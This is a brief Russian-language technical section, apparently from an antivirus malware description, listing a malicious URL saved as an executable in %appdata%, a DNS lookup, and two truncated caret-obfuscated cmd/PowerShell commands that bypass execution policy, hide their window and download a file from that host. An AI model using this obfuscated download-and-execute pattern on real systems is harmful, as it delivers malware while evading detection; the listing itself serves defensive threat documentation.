Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWe^rsHELl.EXE -^Ex^e^CuTiONpo^li^cy ByPAS^S -No^Prof^i^Le -^winDoW^styLe H^I^dD^en^ (^n^eW-^o^Bj^EcT sYS^TEm.^neT.^WE^bC^L^IE^nT^)^.^DownLoA^D^File(^'http://www.zonedopesa.top/...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "P^OWe^rsHELl.EXE -^Ex^e^CuTiONpo^li^cy ByPAS^S -No^Prof^i^Le -^winDoW^styLe H^I^dD^en^ (^n^eW-^o^Bj^EcT sYS^TEm.^neT.^WE^bC^L^IE^nT^)^.^DownLoA^D^File(^'http://www.zonedopesa.top/...' (со скрытым окном)